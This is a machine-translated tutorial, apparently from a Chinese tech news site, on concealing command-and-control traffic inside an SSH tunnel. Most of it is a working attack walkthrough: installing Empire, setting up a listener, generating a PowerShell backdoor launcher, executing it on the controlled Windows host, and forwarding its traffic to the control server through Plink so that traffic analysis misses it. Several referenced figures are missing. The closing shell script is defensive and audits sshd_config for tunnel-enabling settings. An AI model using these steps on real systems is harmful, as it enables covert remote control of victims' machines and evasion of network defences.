2025-02-24 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 06/01 Report
How to use SSH tunnel encryption to conceal C&C (command and control) communication traffic is something many beginners are unclear about. To help with that, the following article explains it in detail; readers who need this can follow along. I hope you get something out of it.
1. Background introduction
In the game of network attack and defense, defensive measures such as network traffic characteristic analysis are widely deployed. Many vendors and enterprises analyze network traffic to detect malicious traffic so that they can take targeted defensive measures; for example, ISPs at every level mostly deploy traffic analysis and detection on their backbone network equipment.
This article establishes an encrypted tunnel using standard SSH port forwarding, which can be used to encrypt and conceal malicious traffic so that the malicious behavior is not discovered by traffic detection. In the reproduction experiment, C&C (command and control) communication traffic is used as the example. C&C traffic that is encrypted and hidden through the SSH tunnel shows up only as standard SSH traffic under external traffic characteristic analysis.
2. Experimental principle
This experiment uses the Empire tool to quickly build the C&C channel; this article only briefly introduces Empire. On the Windows platform, the SSH function of the Plink.exe tool is used to build the SSH tunnel.
2.1 Introduction to SSH tunnels
SSH automatically encrypts and decrypts the network data passing between an SSH client and an SSH server. SSH can also forward the network data of other TCP ports through the SSH link, automatically providing the corresponding encryption and decryption. This process is also called "tunneling", so named because SSH provides a secure channel through which other TCP connections are transmitted. An SSH tunnel is implemented mainly through SSH's port-forwarding parameters: the data to be transmitted is forwarded through the encrypted SSH tunnel. SSH port forwarding provides two main functions:
1. Encrypt the communication data between the SSH client and the SSH server.
2. Bypass firewall restrictions to complete TCP connections that otherwise could not be established.
Because of SSH's security, nobody else can read the data content while it crosses the public network. There are three kinds of SSH port forwarding: local forwarding, remote forwarding and dynamic port forwarding. This experiment mainly takes local forwarding as an example.
Local forwarding is explained mainly through the -L parameter of SSH (parts 1 to 3 below refer to the three parts of the command shown in the figure):
(1) Part 1: the -L option indicates that an SSH tunnel is established using "local forwarding", which means that communication data arriving on a local port is forwarded to the corresponding port of the target host.
(2) Part 2: the communication data is forwarded from local port 9906 and finally delivered to port 3306 on 10.1.0.2.
(3) Part 3: the SSH tunnel we create connects as the root user on 10.1.0.2.
2.2 Introduction to the Empire tool
Empire is a post-exploitation attack framework targeting the Windows platform that provides a complete set of functions, from stager generation to privilege escalation and persistence. Its biggest feature is that it uses PowerShell scripts as the attack payload, and Empire can run its PowerShell agent without powershell.exe; that is, it is a pure-PowerShell post-exploitation agent. Post-exploitation modules can be deployed rapidly; the built-in modules include a keylogger, Mimikatz, UAC bypass, intranet scanning and so on, and its communication can be adapted to evade network detection and the detection and removal of most security protection tools. Simply put, Empire is similar to the penetration tool Metasploit: a remote-control Trojan based on PowerShell.
2.3 Empire tool installation
Install it in the experimental Linux virtual machine, on the command line:
git clone https://github.com/EmpireProject/Empire.git
# enter the setup directory and run the installer
cd Empire
cd setup
sudo ./install.sh
After the installation succeeds, confirm that the files (directories) in the Empire directory are as shown below:
Start Empire with ./empire; if it starts as shown in the following figure, the installation succeeded.
3. Experimental steps
The experiment uses two virtual machines, Ubuntu 16 and Windows 7: Ubuntu 16 simulates the control side and Windows 7 simulates the controlled host.
3.1 Building the SSH server on the Ubuntu system
(1) Install the OpenSSH server
sudo apt-get install openssh-server
(2) Configure the SSH server
Edit the /etc/ssh/sshd_config file to allow password login; the PermitRootLogin setting is configured as shown below:
(3) Test whether the SSH login succeeds
Check the local IP (Linux command: ifconfig). Under Windows, use the XShell tool to connect to the server IP and enter the login name and password; if you log in to the system successfully, the SSH server side has been built successfully.
Note: the sshd service needs to be restarted: /etc/init.d/ssh restart
(4) Configure RSA key-pair authentication login
A) Generate an RSA key pair:
ssh-keygen -t rsa
B) Enable sshd to support RSA authentication and add the path of the authorized public key file.
C) Set the PubkeyAuthentication option in the /etc/ssh/sshd_config file to yes, that is:
D) Copy the public key into the .ssh folder in the user's home directory. Note that you must use the following command to copy it from the controlled host (Windows 7 is used for the simulation in this experiment); otherwise the file permission settings are prone to errors.
ssh-copy-id -i id_rsa.pub <host login user name>@192.168.81.137
E) Log in over SSH using the private key:
ssh -i <private key path> <host login user name>@192.168.81.137
Note: when using tools such as PuTTY or WinSCP, you need to import the RSA private key with the corresponding platform tool and convert it into that tool's file format. For example, this experiment uses the PuTTY tool to import the private key and generate the file sshrsa.ppk.
3.2 Use the Empire tool to generate a PowerShell script backdoor
The Empire tool is similar to Metasploit; for a detailed tutorial you can refer to an article on mastering PowerShell Empire.
In this experiment, Empire is used to generate a simple PowerShell script that establishes the simplest possible C&C communication. The main steps are briefly summarized below.
(1) Set up a listener
listeners            # enter "list" to view the configured listeners
uselistener http     # enter "info" to view the required parameters
set Name 4444
set Port 4444
set Host 127.0.0.1   # this experiment communicates through the SSH tunnel, so the listener is bound to 127.0.0.1
execute              # create a listener named 4444 that listens for communication data on 127.0.0.1
info 4444
An example is shown below:
(2) Generate a simple PowerShell payload script (for Windows)
launcher powershell 4444   # entering "stagers" lets you generate other Trojans and remote-control programs; in this experiment the simplest PowerShell script is generated directly
Note: the generated PowerShell code is copied and saved directly for execution on the controlled Windows hosts (Windows 7, Windows 10).
3.3 Construction of the SSH tunnel
(1) Use Plink.exe (the command-line tool in the PuTTY toolset for SSH connections on Windows) to connect to the SSH server from Windows.
# first change to the directory containing the Plink.exe file:
Plink.exe -ssh -l <login user name> -pw <login password> <SSH host IP>
(2) Plink parameters used here
-ssh  use the SSH connection protocol
-l    specify the login user name
-i    specify the RSA private key for login
-L    local forwarding
(3) Plink port forwarding design
Plink.exe -ssh -i sshrsa.ppk am00n@192.168.81.137 -L 4444:192.168.81.137:4444
This forwards the local port (4444) to the destination port (4444) on the remote destination host (192.168.81.137).
Note: after the above command executes successfully, keep the command-line window open. Other SSH parameters can also be combined with it to run in the background, without interaction, and so on.
(4) Use the PowerShell script generated in (2) to bring the controlled host online.
A) On the Windows 7 virtual machine, open a separate CMD window and paste in the PowerShell script to execute it. The controlled host can then be seen coming online.
B) Switch to the agents interface on Ubuntu; the output of the list command is shown in the figure:
C) Through the interact command, the established control channel can be used to control the controlled host, for example tested successfully with a simple ls command, as shown below:
D) At this point the SSH tunnel has been used successfully to transmit C&C communication traffic; on this basis other C&C control commands and other malicious functions can be designed and implemented.
This experiment shows that attackers can use public services such as SSH, or other readily available technologies, to assist an attack, and that doing so is very easy to implement.
Summary of key steps:
(1) Set up the SSH service and configure it to log in with an RSA private key (it can also be configured for password-free login).
(2) Use tools (such as Empire, Metasploit, etc.) to build the C&C.
(3) Use SSH port forwarding to build the SSH tunnel.
(4) Configure the C&C and SSH parameters to achieve the goal of encrypting and hiding the malicious traffic.
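From the defender's side, whether the local forwarding in step (3) is honoured at all is decided by the server's sshd_config (AllowTcpForwarding, and PermitOpen to restrict destinations), together with the PermitRootLogin and PasswordAuthentication settings from step (1). The following shell script is an added example, not code from the original article: it reads the effective value of each keyword the way sshd does (the first occurrence in the global section wins, Match blocks are not evaluated here) and reports settings that leave such a tunnel possible. The sample config files and the function names sshd_opt and audit_sshd are constructed for this example; the defaults assumed are those documented for OpenSSH 7.0 and later.

```shell
# Added example: audit an sshd_config for settings that permit the tunnel above.
# sshd applies the FIRST value it sees for a keyword, so a hardening line appended
# at the end is ignored when the keyword was already set earlier in the file.
# Assumed: "Keyword value" syntax, global section only (reading stops at the
# first Match block), OpenSSH 7.0+ defaults (PermitRootLogin prohibit-password).
# sshd_opt FILE KEYWORD DEFAULT -> prints the effective value, lower-cased
sshd_opt() {
    awk -v key="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" -v def="$3" '
        NF == 0 || $1 ~ /^#/   { next }   # blank or comment line
        tolower($1) == "match" { exit }   # conditional block: stop reading
        tolower($1) == key     { print tolower($2); found = 1; exit }
        END { if (!found) print tolower(def) }
    ' "$1"
}
# audit_sshd FILE -> prints one line per weak setting, returns the count
audit_sshd() {
    f=$1; n=0
    # keyword, OpenSSH default, value that closes off the tunnel
    for spec in 'AllowTcpForwarding yes no' \
                'PermitRootLogin prohibit-password no' \
                'PasswordAuthentication yes no'; do
        set -- $spec
        v=$(sshd_opt "$f" "$1" "$2")
        if [ "$v" != "$3" ]; then
            echo "$1 is effectively '$v', expected '$3'"
            n=$((n + 1))
        fi
    done
    return "$n"
}
# Constructed sample 1: the article's server; the "no" appended last is never applied.
weak_cfg=$(mktemp); hard_cfg=$(mktemp)
trap 'rm -f "$weak_cfg" "$hard_cfg"' EXIT
cat > "$weak_cfg" <<'EOF'
PermitRootLogin yes
AllowTcpForwarding yes
AllowTcpForwarding no
EOF
# Constructed sample 2: hardened globally; the Match block is not read by this audit.
cat > "$hard_cfg" <<'EOF'
PermitRootLogin no
PasswordAuthentication no
AllowTcpForwarding no
Match User backup
    AllowTcpForwarding yes
EOF
audit_sshd "$weak_cfg" || echo "weak config: $? finding(s)"
audit_sshd "$hard_cfg" && echo "hardened config: no findings"
```

On a live server, compare the script's view with `sshd -T`, which prints the fully resolved configuration including Match blocks.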